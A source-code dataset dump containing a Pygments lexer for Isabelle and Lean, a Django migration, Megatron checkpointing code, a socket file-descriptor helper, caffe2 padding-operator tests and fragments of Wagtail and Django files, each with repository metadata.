'partial_function', 'primcorec', 'primrec', 'primrec_new',
'print_ast_translation', 'print_translation', 'quickcheck_generator',
'quickcheck_params', 'realizability', 'realizers', 'recdef', 'record',
'refute_params', 'setup', 'setup_lifting', 'simproc_setup',
'simps_of_case', 'sledgehammer_params', 'spark_end', 'spark_open',
'spark_open_siv', 'spark_open_vcg', 'spark_proof_functions',
'spark_types', 'statespace', 'syntax', 'syntax_declaration', 'text',
'text_raw', 'theorems', 'translations', 'type_notation',
'type_synonym', 'typed_print_translation', 'typedecl', 'hoarestate',
'install_C_file', 'install_C_types', 'wpc_setup', 'c_defs', 'c_types',
'memsafe', 'SML_export', 'SML_file', 'SML_import', 'approximate',
'bnf_axiomatization', 'cartouche', 'datatype_compat',
'free_constructors', 'functor', 'nominal_function',
'nominal_termination', 'permanent_interpretation',
'binds', 'defining', 'smt2_status', 'term_cartouche',
'boogie_file', 'text_cartouche',
)
keyword_theory_script = ('inductive_cases', 'inductive_simps')
keyword_theory_goal = (
'ax_specification', 'bnf', 'code_pred', 'corollary', 'cpodef',
'crunch', 'crunch_ignore',
'enriched_type', 'function', 'instance', 'interpretation', 'lemma',
'lift_definition', 'nominal_inductive', 'nominal_inductive2',
'nominal_primrec', 'pcpodef', 'primcorecursive',
'quotient_definition', 'quotient_type', 'recdef_tc', 'rep_datatype',
'schematic_corollary', 'schematic_lemma', 'schematic_theorem',
'spark_vc', 'specification', 'subclass', 'sublocale', 'termination',
'theorem', 'typedef', 'wrap_free_constructors',
)
keyword_qed = ('by', 'done', 'qed')
keyword_abandon_proof = ('sorry', 'oops')
keyword_proof_goal = ('have', 'hence', 'interpret')
keyword_proof_block = ('next', 'proof')
keyword_proof_chain = (
'finally', 'from', 'then', 'ultimately', 'with',
)
keyword_proof_decl = (
'ML_prf', 'also', 'include', 'including', 'let', 'moreover', 'note',
'txt', 'txt_raw', 'unfolding', 'using', 'write',
)
keyword_proof_asm = ('assume', 'case', 'def', 'fix', 'presume')
keyword_proof_asm_goal = ('guess', 'obtain', 'show', 'thus')
keyword_proof_script = (
'apply', 'apply_end', 'apply_trace', 'back', 'defer', 'prefer',
)
operators = (
'::', ':', '(', ')', '[', ']', '_', '=', ',', '|',
'+', '-', '!', '?',
)
proof_operators = ('{', '}', '.', '..')
tokens = {
'root': [
(r'\s+', Text),
(r'\(\*', Comment, 'comment'),
(r'\{\*', Comment, 'text'),
(words(operators), Operator),
(words(proof_operators), Operator.Word),
(words(keyword_minor, prefix=r'\b', suffix=r'\b'), Keyword.Pseudo),
(words(keyword_diag, prefix=r'\b', suffix=r'\b'), Keyword.Type),
(words(keyword_thy, prefix=r'\b', suffix=r'\b'), Keyword),
(words(keyword_theory_decl, prefix=r'\b', suffix=r'\b'), Keyword),
(words(keyword_section, prefix=r'\b', suffix=r'\b'), Generic.Heading),
(words(keyword_subsection, prefix=r'\b', suffix=r'\b'), Generic.Subheading),
(words(keyword_theory_goal, prefix=r'\b', suffix=r'\b'), Keyword.Namespace),
(words(keyword_theory_script, prefix=r'\b', suffix=r'\b'), Keyword.Namespace),
(words(keyword_abandon_proof, prefix=r'\b', suffix=r'\b'), Generic.Error),
(words(keyword_qed, prefix=r'\b', suffix=r'\b'), Keyword),
(words(keyword_proof_goal, prefix=r'\b', suffix=r'\b'), Keyword),
(words(keyword_proof_block, prefix=r'\b', suffix=r'\b'), Keyword),
(words(keyword_proof_decl, prefix=r'\b', suffix=r'\b'), Keyword),
(words(keyword_proof_chain, prefix=r'\b', suffix=r'\b'), Keyword),
(words(keyword_proof_asm, prefix=r'\b', suffix=r'\b'), Keyword),
(words(keyword_proof_asm_goal, prefix=r'\b', suffix=r'\b'), Keyword),
(words(keyword_proof_script, prefix=r'\b', suffix=r'\b'), Keyword.Pseudo),
(r'\\<\w*>', Text.Symbol),
(r"[^\W\d][.\w']*", Name),
(r"\?[^\W\d][.\w']*", Name),
(r"'[^\W\d][.\w']*", Name.Type),
(r'\d[\d_]*', Name), # display numbers as name
(r'0[xX][\da-fA-F][\da-fA-F_]*', Number.Hex),
(r'0[oO][0-7][0-7_]*', Number.Oct),
(r'0[bB][01][01_]*', Number.Bin),
(r'"', String, 'string'),
(r'`', String.Other, 'fact'),
],
'comment': [
(r'[^(*)]+', Comment),
(r'\(\*', Comment, '#push'),
(r'\*\)', Comment, '#pop'),
(r'[(*)]', Comment),
],
'text': [
(r'[^*}]+', Comment),
(r'\*\}', Comment, '#pop'),
(r'\*', Comment),
(r'\}', Comment),
],
'string': [
(r'[^"\\]+', String),
(r'\\<\w*>', String.Symbol),
(r'\\"', String),
(r'\\', String),
(r'"', String, '#pop'),
],
'fact': [
(r'[^`\\]+', String.Other),
(r'\\<\w*>', String.Symbol),
(r'\\`', String.Other),
(r'\\', String.Other),
(r'`', String.Other, '#pop'),
],
}
class LeanLexer(RegexLexer):
"""
For the `Lean <https://github.com/leanprover/lean>`_
theorem prover.
.. versionadded:: 2.0
"""
name = 'Lean'
aliases = ['lean']
filenames = ['*.lean']
mimetypes = ['text/x-lean']
flags = re.MULTILINE | re.UNICODE
tokens = {
'root': [
(r'\s+', Text),
(r'/--', String.Doc, 'docstring'),
(r'/-', Comment, 'comment'),
(r'--.*?$', Comment.Single),
(words((
'import', 'renaming', 'hiding',
'namespace',
'local',
'private', 'protected', 'section',
'include', 'omit', 'section',
'protected', 'export',
'open',
'attribute',
), prefix=r'\b', suffix=r'\b'), Keyword.Namespace),
(words((
'lemma', 'theorem', 'def', 'definition', 'example',
'axiom', 'axioms', 'constant', 'constants',
'universe', 'universes',
'inductive', 'coinductive', 'structure', 'extends',
'class', 'instance',
'abbreviation',
'noncomputable theory',
'noncomputable', 'mutual', 'meta',
'attribute',
'parameter', 'parameters',
'variable', 'variables',
'reserve', 'precedence',
'postfix', 'prefix', 'notation', 'infix', 'infixl', 'infixr',
'begin', 'by', 'end',
'set_option',
'run_cmd',
), prefix=r'\b', suffix=r'\b'), Keyword.Declaration),
(r'@\[[^\]]*\]', Keyword.Declaration),
(words((
'forall', 'fun', 'Pi', 'from', 'have', 'show', 'assume', 'suffices',
'let', 'if', 'else', 'then', 'in', 'with', 'calc', 'match',
'do'
), prefix=r'\b', suffix=r'\b'), Keyword),
(words(('sorry', 'admit'), prefix=r'\b', suffix=r'\b'), Generic.Error),
(words(('Sort', 'Prop', 'Type'), prefix=r'\b', suffix=r'\b'), Keyword.Type),
(words((
'#eval', '#check', '#reduce', '#exit',
'#print', '#help',
), suffix=r'\b'), Keyword),
(words((
'(', ')', ':', '{', '}', '[', ']', '⟨', '⟩', '‹', '›', '⦃', '⦄', ':=', ',',
)), Operator),
(r'[A-Za-z_\u03b1-\u03ba\u03bc-\u03fb\u1f00-\u1ffe\u2100-\u214f]'
r'[.A-Za-z_\'\u03b1-\u03ba\u03bc-\u03fb\u1f00-\u1ffe\u2070-\u2079'
r'\u207f-\u2089\u2090-\u209c\u2100-\u214f0-9]*', Name),
(r'0x[A-Za-z0-9]+', Number.Integer),
(r'0b[01]+', Number.Integer),
(r'\d+', Number.Integer),
(r'"', String.Double, 'string'),
(r"'(?:(\\[\\\"'nt])|(\\x[0-9a-fA-F]{2})|(\\u[0-9a-fA-F]{4})|.)'", String.Char),
(r'[~?][a-z][\w\']*:', Name.Variable),
(r'\S', Name.Builtin.Pseudo),
],
'comment': [
(r'[^/-]', Comment.Multiline),
(r'/-', Comment.Multiline, '#push'),
(r'-/', Comment.Multiline, '#pop'),
(r'[/-]', Comment.Multiline)
],
'docstring': [
(r'[^/-]', String.Doc),
(r'-/', String.Doc, '#pop'),
(r'[/-]', String.Doc)
],
'string': [
(r'[^\\"]+', String.Double),
(r"(?:(\\[\\\"'nt])|(\\x[0-9a-fA-F]{2})|(\\u[0-9a-fA-F]{4}))", String.Escape),
('"', String.Double, '#pop'),
],
}
| [
"[email protected]"
] | |
d0fa78d37064bf03251c9c6edf18a378195106d5 | 6196bd8f9226042b4c8e171313e273d1875c3ee4 | /up_down_chain/up_down_chain/app/Subseribe/migrations/0002_bidsusersetting_mid.py | d2f23630662918aa99b11057208f625ad32ce97c | [] | no_license | wang18722/Up_down_chain | 87230f057dadea95ab8b2760ca756afe00675b26 | 3c18d5d5727db1562438edea66ef15f54b378e33 | refs/heads/master | 2022-12-27T09:04:49.976753 | 2019-07-01T01:19:12 | 2019-07-01T01:19:12 | 225,579,284 | 0 | 0 | null | 2022-12-08T01:23:21 | 2019-12-03T09:22:22 | Python | UTF-8 | Python | false | false | 694 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.11 on 2019-06-24 05:29
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('Subseribe', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='bidsusersetting',
name='mid',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='用户'),
),
]
| [
"[email protected]"
] | |
2770b1389482e8828867d97a6aa1bf0489db3e64 | 4fc86f5c444f52619f9f748c9bad5bf3e0e2c0b2 | /megatron/checkpointing.py | ddada534b7786ee8a8fd8062495fd8c81ab1ff93 | [
"MIT",
"Apache-2.0"
] | permissive | Xianchao-Wu/megatron2 | 95ea620b74c66e51f9e31075b1df6bb1b761678b | f793c37223b32051cb61d3b1d5661dddd57634bf | refs/heads/main | 2023-08-17T03:42:31.602515 | 2021-09-24T05:12:00 | 2021-09-24T05:12:00 | 330,527,561 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,103 | py | # coding=utf-8
# Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Input/output checkpointing."""
import os
import random
import sys
import numpy as np
import torch
from torch.nn.parallel import DistributedDataParallel as torchDDP
from megatron import mpu, get_args, update_num_microbatches
from megatron import get_args
from megatron import print_rank_0
_CHECKPOINT_VERSION = None
def set_checkpoint_version(value):
global _CHECKPOINT_VERSION
assert _CHECKPOINT_VERSION is None, \
"checkpoint version already set"
_CHECKPOINT_VERSION = value
def get_checkpoint_version():
global _CHECKPOINT_VERSION
return _CHECKPOINT_VERSION
def check_checkpoint_args(checkpoint_args):
"""Ensure fixed arguments for a model are the same for the input
arguments and the one retrieved from checkpoint."""
args = get_args()
def _compare(arg_name, old_arg_name=None):
if old_arg_name is not None:
checkpoint_value = getattr(checkpoint_args, old_arg_name)
else:
checkpoint_value = getattr(checkpoint_args, arg_name)
args_value = getattr(args, arg_name)
error_message = '{} value from checkpoint ({}) is not equal to the ' \
'input argument value ({}).'.format(
arg_name, checkpoint_value, args_value)
assert checkpoint_value == args_value, error_message
_compare('num_layers')
_compare('hidden_size')
_compare('num_attention_heads')
_compare('max_position_embeddings')
_compare('make_vocab_size_divisible_by')
_compare('padded_vocab_size')
_compare('tokenizer_type')
if get_checkpoint_version() < 3.0:
_compare('tensor_model_parallel_size',
old_arg_name='model_parallel_size')
if get_checkpoint_version() >= 3.0:
_compare('tensor_model_parallel_size')
_compare('pipeline_model_parallel_size')
def ensure_directory_exists(filename):
"""Build filename's path if it does not already exists."""
dirname = os.path.dirname(filename)
if not os.path.exists(dirname):
os.makedirs(dirname)
def get_checkpoint_name(checkpoints_path, iteration,
release=False):
"""A unified checkpoint name."""
if release:
directory = 'release'
else:
directory = 'iter_{:07d}'.format(iteration)
# Use both the tensor and pipeline MP rank.
if mpu.get_pipeline_model_parallel_world_size() == 1:
return os.path.join(checkpoints_path, directory,
'mp_rank_{:02d}'.format(
mpu.get_tensor_model_parallel_rank()),
'model_optim_rng.pt')
return os.path.join(checkpoints_path, directory, # TODO important for mp=model parallel, not implemented yet!
'mp_rank_{:02d}_{:03d}'.format(
mpu.get_tensor_model_parallel_rank(),
mpu.get_pipeline_model_parallel_rank()),
'model_optim_rng.pt')
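# Illustrative note (added, not in the original file): for iteration=5000,
# tensor-parallel rank 1 and pipeline rank 2, the format strings above yield
#   <checkpoints_path>/iter_0005000/mp_rank_01/model_optim_rng.pt       (pipeline world size == 1)
#   <checkpoints_path>/iter_0005000/mp_rank_01_002/model_optim_rng.pt   (pipeline world size > 1)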
def get_checkpoint_tracker_filename(checkpoints_path):
"""Tracker file rescords the latest chckpoint during
training to restart from."""
return os.path.join(checkpoints_path, 'latest_checkpointed_iteration.txt')
def save_checkpoint(iteration, model, optimizer, lr_scheduler):
"""Save a model checkpoint."""
args = get_args()
# Only rank zero of the data parallel writes to the disk.
if isinstance(model, torchDDP):
model = model.module
if torch.distributed.get_rank() == 0:
print('saving checkpoint at iteration {:7d} to {}'.format(
iteration, args.save), flush=True)
if mpu.get_data_parallel_rank() == 0:
# Arguments, iteration, and model.
state_dict = {}
state_dict['args'] = args
state_dict['checkpoint_version'] = 3.0
state_dict['iteration'] = iteration
state_dict['model'] = model.state_dict_for_save_checkpoint()
# Optimizer stuff.
if not args.no_save_optim:
if optimizer is not None:
state_dict['optimizer'] = optimizer.state_dict()
if lr_scheduler is not None:
state_dict['lr_scheduler'] = lr_scheduler.state_dict()
# RNG states.
if not args.no_save_rng:
state_dict['random_rng_state'] = random.getstate()
state_dict['np_rng_state'] = np.random.get_state()
state_dict['torch_rng_state'] = torch.get_rng_state()
state_dict['cuda_rng_state'] = torch.cuda.get_rng_state()
state_dict['rng_tracker_states'] \
= mpu.get_cuda_rng_tracker().get_states()
# Save.
checkpoint_name = get_checkpoint_name(args.save, iteration)
ensure_directory_exists(checkpoint_name)
torch.save(state_dict, checkpoint_name)
# Wait so everyone is done (necessary)
torch.distributed.barrier()
if torch.distributed.get_rank() == 0:
print(' successfully saved checkpoint at iteration {:7d} to {}'.format(
iteration, args.save), flush=True)
# And update the latest iteration
if torch.distributed.get_rank() == 0:
tracker_filename = get_checkpoint_tracker_filename(args.save)
with open(tracker_filename, 'w') as f:
f.write(str(iteration))
# Wait so everyone is done (not necessary)
torch.distributed.barrier()
def load_checkpoint(model, optimizer, lr_scheduler, load_arg='load'):
"""Load a model checkpoint and return the iteration."""
args = get_args()
load_dir = getattr(args, load_arg)
if isinstance(model, torchDDP):
model = model.module
# Read the tracker file and set the iteration.
tracker_filename = get_checkpoint_tracker_filename(load_dir)
    # If no tracker file, return iteration zero.
if not os.path.isfile(tracker_filename):
print_rank_0('WARNING: could not find the metadata file {} '.format(
tracker_filename))
print_rank_0(' will not load any checkpoints and will start from '
'random')
return 0
# Otherwise, read the tracker file and either set the iteration or
# mark it as a release checkpoint.
iteration = 0
release = False
with open(tracker_filename, 'r') as f:
metastring = f.read().strip() # 'release'
try:
iteration = int(metastring)
except ValueError:
release = metastring == 'release'
if not release:
print_rank_0('ERROR: Invalid metadata file {}. Exiting'.format(
tracker_filename))
sys.exit()
assert iteration > 0 or release, 'error parsing metadata file {}'.format(
tracker_filename)
# Checkpoint.
checkpoint_name = get_checkpoint_name(load_dir, iteration, release)
if torch.distributed.get_rank() == 0:
print(' loading checkpoint from {} at iteration {}'.format(
args.load, iteration), flush=True)
# Load the checkpoint.
try:
print('checkpoint_name={}'.format(checkpoint_name))
state_dict = torch.load(checkpoint_name, map_location='cpu') # TODO important here for loading state_dict into memory!
except ModuleNotFoundError:
from megatron.fp16_deprecated import loss_scaler
# For backward compatibility.
print_rank_0(' > deserializing using the old code structure ...')
sys.modules['fp16.loss_scaler'] = sys.modules[
'megatron.fp16_deprecated.loss_scaler']
sys.modules['megatron.fp16.loss_scaler'] = sys.modules[
'megatron.fp16_deprecated.loss_scaler']
state_dict = torch.load(checkpoint_name, map_location='cpu')
sys.modules.pop('fp16.loss_scaler', None)
sys.modules.pop('megatron.fp16.loss_scaler', None)
except BaseException:
print_rank_0('could not load the checkpoint')
sys.exit()
# set checkpoint version
set_checkpoint_version(state_dict.get('checkpoint_version', 0))
# Set iteration.
if args.finetune or release:
iteration = 0
else:
try:
iteration = state_dict['iteration'] # 2,000,000
except KeyError:
try: # Backward compatible with older checkpoints
iteration = state_dict['total_iters']
except KeyError:
print_rank_0('A metadata file exists but unable to load '
'iteration from checkpoint {}, exiting'.format(
checkpoint_name))
sys.exit()
# Check arguments.
assert args.consumed_train_samples == 0
assert args.consumed_valid_samples == 0
if 'args' in state_dict:
checkpoint_args = state_dict['args']
check_checkpoint_args(checkpoint_args)
args.consumed_train_samples = getattr(checkpoint_args,
'consumed_train_samples', 0)
update_num_microbatches(consumed_samples=args.consumed_train_samples)
args.consumed_valid_samples = getattr(checkpoint_args,
'consumed_valid_samples', 0)
else:
print_rank_0('could not find arguments(args) in the checkpoint ...')
# Model. TODO important for loading state_dict
model.load_state_dict(state_dict['model'])
# Optimizer.
if not release and not args.finetune and not args.no_load_optim:
try:
if optimizer is not None:
optimizer.load_state_dict(state_dict['optimizer'])
if lr_scheduler is not None:
lr_scheduler.load_state_dict(state_dict['lr_scheduler'])
except KeyError:
print_rank_0('Unable to load optimizer from checkpoint {}. '
'Specify --no-load-optim or --finetune to prevent '
'attempting to load the optimizer state, '
'exiting ...'.format(checkpoint_name))
sys.exit()
# rng states.
if not release and not args.finetune and not args.no_load_rng:
try:
random.setstate(state_dict['random_rng_state'])
np.random.set_state(state_dict['np_rng_state'])
torch.set_rng_state(state_dict['torch_rng_state'])
torch.cuda.set_rng_state(state_dict['cuda_rng_state'])
mpu.get_cuda_rng_tracker().set_states(
state_dict['rng_tracker_states'])
except KeyError:
print_rank_0('Unable to load optimizer from checkpoint {}. '
'Specify --no-load-rng or --finetune to prevent '
'attempting to load the optimizer state, '
'exiting ...'.format(checkpoint_name))
sys.exit()
torch.distributed.barrier()
if torch.distributed.get_rank() == 0:
print(' successfully loaded checkpoint from {} at iteration {}'.format(
args.load, iteration), flush=True)
# args.load='/workspace/megatron/ngc_models/release_bert_345m_uncased', iteration=0
return iteration
def load_ict_checkpoint(model, only_query_model=False, only_block_model=False, from_realm_chkpt=False):
"""selectively load ICT models for indexing/retrieving from ICT or REALM checkpoints"""
args = get_args()
if isinstance(model, torchDDP):
model = model.module
load_path = args.load if from_realm_chkpt else args.ict_load
tracker_filename = get_checkpoint_tracker_filename(load_path)
with open(tracker_filename, 'r') as f:
iteration = int(f.read().strip())
# assert iteration > 0
checkpoint_name = get_checkpoint_name(load_path, iteration, False)
if mpu.get_data_parallel_rank() == 0:
print('global rank {} is loading checkpoint {}'.format(
torch.distributed.get_rank(), checkpoint_name))
state_dict = torch.load(checkpoint_name, map_location='cpu')
ict_state_dict = state_dict['model']
if from_realm_chkpt and mpu.get_data_parallel_rank() == 0:
print(" loading ICT state dict from REALM", flush=True)
ict_state_dict = ict_state_dict['retriever']['ict_model']
if only_query_model:
ict_state_dict.pop('context_model')
if only_block_model:
ict_state_dict.pop('question_model')
model.load_state_dict(ict_state_dict)
torch.distributed.barrier()
if mpu.get_data_parallel_rank() == 0:
print(' successfully loaded {}'.format(checkpoint_name))
return model
| [
"[email protected]"
] | |
2ab9c6aae658796991d04ae8393361738813a7fb | b6233af6a39e7ab500743d6b2ac7d52f68ae3be2 | /15/00/2.py | b738c43f76091d7e37910b5e9ab030f6c459d903 | [
"CC0-1.0"
] | permissive | pylangstudy/201712 | 9754526e1d8f1c0519fcce98bc7df803f456cc4e | f18f1251074729c4a3865b113edc89ec06b54130 | refs/heads/master | 2021-09-02T06:08:08.278115 | 2017-12-30T23:04:55 | 2017-12-30T23:04:55 | 112,670,974 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 149 | py | import socket, array
def send_fds(sock, msg, fds):
return sock.sendmsg([msg], [(socket.SOL_SOCKET, socket.SCM_RIGHTS, array.array("i", fds))])
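# Companion sketch (added; not in the original file): the receiving side of
# send_fds above, following the ancillary-data recipe from the CPython
# socket documentation. msglen and maxfds are assumed parameter names.
def recv_fds(sock, msglen, maxfds):
    fds = array.array("i")  # array of C ints
    msg, ancdata, flags, addr = sock.recvmsg(msglen,
                                             socket.CMSG_LEN(maxfds * fds.itemsize))
    for cmsg_level, cmsg_type, cmsg_data in ancdata:
        if cmsg_level == socket.SOL_SOCKET and cmsg_type == socket.SCM_RIGHTS:
            # Append the received descriptors, ignoring any truncated
            # trailing bytes that do not form a whole integer.
            fds.frombytes(cmsg_data[:len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
    return msg, list(fds)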
| [
"[email protected]"
] | |
2245d137d3c96c0d0184ca4ce3a2b2930945227a | e0980f704a573894350e285f66f4cf390837238e | /.history/news/models_20201124125236.py | 70a66f359a9f8e8b4fff11e3efb6146fd18c69f7 | [] | no_license | rucpata/WagtailWebsite | 28008474ec779d12ef43bceb61827168274a8b61 | 5aa44f51592f49c9a708fc5515ad877c6a29dfd9 | refs/heads/main | 2023-02-09T15:30:02.133415 | 2021-01-05T14:55:45 | 2021-01-05T14:55:45 | 303,961,094 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 160 | py | from django.db import models
from wagtail.contrib.forms.models import AbstractEmailForm
# Create your models here.
class NewsPage(AbstractEmailForm):
te | [
"[email protected]"
] | |
fdf3d2f3fa34b5f31a1a475f8b88058eb6fae21b | bff20a295661ddf2900a2777165f9b4bdfb5656b | /caffe2/python/operator_test/sequence_ops_test.py | 7afca6bdc0524fae9ad0460ff8998981fda678f4 | [
"BSD-2-Clause",
"MIT",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla"
] | permissive | wangxu823/caffe2 | cc8ba41abacb36dd5ebb1c4ed68aaae6d43dd91f | 0a68778916f3280b5292fce0d74b73b70fb0f7e8 | refs/heads/master | 2021-04-04T11:29:54.224522 | 2016-08-09T23:22:45 | 2016-08-09T23:22:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,548 | py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from caffe2.python import core
from hypothesis import given
import caffe2.python.hypothesis_test_util as hu
import hypothesis.strategies as st
import numpy as np
from functools import partial
def _gen_test_add_padding(with_pad_data=True,
is_remove=False):
def gen_with_size(args):
lengths, inner_shape = args
data_dim = [sum(lengths)] + inner_shape
lengths = np.array(lengths, dtype=np.int64)
if with_pad_data:
return st.tuples(
st.just(lengths),
hu.arrays(data_dim),
hu.arrays(inner_shape),
hu.arrays(inner_shape))
else:
return st.tuples(st.just(lengths), hu.arrays(data_dim))
min_len = 4 if is_remove else 0
lengths = st.lists(
st.integers(min_value=min_len, max_value=10),
min_size=0,
max_size=5)
inner_shape = st.lists(
st.integers(min_value=1, max_value=3),
min_size=0,
max_size=2)
return st.tuples(lengths, inner_shape).flatmap(gen_with_size)
def _add_padding_ref(
start_pad_width, end_pad_width,
data, lengths, start_padding=None, end_padding=None):
if start_padding is None:
start_padding = np.zeros(data.shape[1:], dtype=data.dtype)
end_padding = (
end_padding if end_padding is not None else start_padding)
out_size = data.shape[0] + (
start_pad_width + end_pad_width) * len(lengths)
out = np.ndarray((out_size,) + data.shape[1:])
in_ptr = 0
out_ptr = 0
for length in lengths:
out[out_ptr:(out_ptr + start_pad_width)] = start_padding
out_ptr += start_pad_width
out[out_ptr:(out_ptr + length)] = data[in_ptr:(in_ptr + length)]
in_ptr += length
out_ptr += length
out[out_ptr:(out_ptr + end_pad_width)] = end_padding
out_ptr += end_pad_width
lengths_out = lengths + (start_pad_width + end_pad_width)
return (out, lengths_out)
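# Worked example (added for clarity): with start_pad_width=1,
# end_pad_width=1, data=[d0, d1], lengths=[2], start_padding=s and
# end_padding=e, the reference above produces out=[s, d0, d1, e] and
# lengths_out=[4].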
def _remove_padding_ref(start_pad_width, end_pad_width, data, lengths):
pad_width = start_pad_width + end_pad_width
out_size = data.shape[0] - (
start_pad_width + end_pad_width) * len(lengths)
out = np.ndarray((out_size,) + data.shape[1:])
in_ptr = 0
out_ptr = 0
for length in lengths:
out_length = length - pad_width
out[out_ptr:(out_ptr + out_length)] = data[
(in_ptr + start_pad_width):(in_ptr + length - end_pad_width)]
in_ptr += length
out_ptr += out_length
lengths_out = lengths - (start_pad_width + end_pad_width)
return (out, lengths_out)
def _gather_padding_ref(start_pad_width, end_pad_width, data, lengths):
start_padding = np.zeros(data.shape[1:], dtype=data.dtype)
end_padding = np.zeros(data.shape[1:], dtype=data.dtype)
pad_width = start_pad_width + end_pad_width
ptr = 0
for length in lengths:
for i in range(start_pad_width):
start_padding += data[ptr]
ptr += 1
ptr += length - pad_width
for i in range(end_pad_width):
end_padding += data[ptr]
ptr += 1
return (start_padding, end_padding)
class TestSequenceOps(hu.HypothesisTestCase):
@given(start_pad_width=st.integers(min_value=1, max_value=2),
end_pad_width=st.integers(min_value=0, max_value=2),
args=_gen_test_add_padding(with_pad_data=True))
def test_add_padding(self, start_pad_width, end_pad_width, args):
lengths, data, start_padding, end_padding = args
start_padding = np.array(start_padding, dtype=np.float32)
end_padding = np.array(end_padding, dtype=np.float32)
op = core.CreateOperator(
'AddPadding',
['data', 'lengths', 'start_padding', 'end_padding'],
['output', 'lengths_out'],
padding_width=start_pad_width,
end_padding_width=end_pad_width)
self.assertReferenceChecks(
hu.cpu_do,
op,
[data, lengths, start_padding, end_padding],
partial(_add_padding_ref, start_pad_width, end_pad_width))
@given(start_pad_width=st.integers(min_value=1, max_value=2),
end_pad_width=st.integers(min_value=0, max_value=2),
args=_gen_test_add_padding(with_pad_data=False))
def test_add_zero_padding(self, start_pad_width, end_pad_width, args):
lengths, data = args
op = core.CreateOperator(
'AddPadding',
['data', 'lengths'],
['output', 'lengths_out'],
padding_width=start_pad_width,
end_padding_width=end_pad_width)
self.assertReferenceChecks(
hu.cpu_do,
op,
[data, lengths],
partial(_add_padding_ref, start_pad_width, end_pad_width))
@given(start_pad_width=st.integers(min_value=1, max_value=2),
end_pad_width=st.integers(min_value=0, max_value=2),
data=hu.tensor(min_dim=1, max_dim=3))
def test_add_padding_no_length(self, start_pad_width, end_pad_width, data):
op = core.CreateOperator(
'AddPadding',
['data'],
['output', 'output_lens'],
padding_width=start_pad_width,
end_padding_width=end_pad_width)
self.assertReferenceChecks(
hu.cpu_do,
op,
[data],
partial(
_add_padding_ref, start_pad_width, end_pad_width,
lengths=np.array([data.shape[0]])))
@given(start_pad_width=st.integers(min_value=1, max_value=2),
end_pad_width=st.integers(min_value=0, max_value=2),
args=_gen_test_add_padding(with_pad_data=False, is_remove=True))
def test_remove_padding(self, start_pad_width, end_pad_width, args):
lengths, data = args
op = core.CreateOperator(
'RemovePadding',
['data', 'lengths'],
['output', 'lengths_out'],
padding_width=start_pad_width,
end_padding_width=end_pad_width)
self.assertReferenceChecks(
hu.cpu_do,
op,
[data, lengths],
partial(_remove_padding_ref, start_pad_width, end_pad_width))
@given(start_pad_width=st.integers(min_value=1, max_value=2),
end_pad_width=st.integers(min_value=0, max_value=2),
args=_gen_test_add_padding(with_pad_data=True))
def test_gather_padding(self, start_pad_width, end_pad_width, args):
lengths, data, start_padding, end_padding = args
padded_data, padded_lengths = _add_padding_ref(
start_pad_width, end_pad_width, data,
lengths, start_padding, end_padding)
op = core.CreateOperator(
'GatherPadding',
['data', 'lengths'],
['start_padding', 'end_padding'],
padding_width=start_pad_width,
end_padding_width=end_pad_width)
self.assertReferenceChecks(
hu.cpu_do,
op,
[padded_data, padded_lengths],
partial(_gather_padding_ref, start_pad_width, end_pad_width))
@given(data=hu.tensor(min_dim=3, max_dim=3, dtype=np.float32,
elements=st.floats(min_value=-np.inf,
max_value=np.inf),
min_value=1, max_value=10),
**hu.gcs_cpu_only)
def test_reverse_packed_segs(self, data, gc, dc):
max_length = data.shape[0]
batch_size = data.shape[1]
lengths = np.random.randint(max_length + 1, size=batch_size)
op = core.CreateOperator(
"ReversePackedSegs",
["data", "lengths"],
["reversed_data"])
def op_ref(data, lengths):
rev_data = np.array(data, copy=True)
for i in range(batch_size):
seg_length = lengths[i]
for j in range(seg_length):
rev_data[j][i] = data[seg_length - 1 - j][i]
return (rev_data,)
def op_grad_ref(grad_out, outputs, inputs):
return op_ref(grad_out, inputs[1]) + (None,)
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[data, lengths],
reference=op_ref,
output_to_grad='reversed_data',
grad_reference=op_grad_ref)
| [
"[email protected]"
] | |
c3e593a11fa780431165c332212fd8a39a54f02a | 0f968baea4554519043c3ed4d1464fe4c64d592f | /src/mesh/deep/__init__.py | 2d81c12b5a07d5cf15b92582b6caa017185c5111 | [] | no_license | seantyh/OntoDeepLex | a50911edea9b3ce9f5997ecab327b4bb54783a00 | 89148884ff09710877d18d0a63da00a304060079 | refs/heads/master | 2023-01-22T23:23:35.653260 | 2020-11-23T13:14:22 | 2020-11-23T13:14:22 | 257,922,503 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 66 | py | from .tensor_utils import BertService
from .vocab import VocabZhTw | [
"[email protected]"
] | |
d85e0b393ae8d8ee90e85e1f7704da446a52d993 | 5e9eba022385185a2c84d60fffe6cdf04421ed1b | /academicos/views.py | e44f4be6e8ae947cd6a615b5209a4e6d14064e29 | [] | no_license | lizceth/proyecto-eventos | 4a6de50ee7ae7705fb7a81cb4fdbdbe2c9ed9516 | b408149a463d130da72bb555237814cc5bb2dbfa | refs/heads/master | 2020-06-02T18:21:08.415503 | 2014-10-14T22:35:26 | 2014-10-14T22:35:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,361 | py | from django.contrib.auth.models import User
from django.shortcuts import render, render_to_response, get_object_or_404
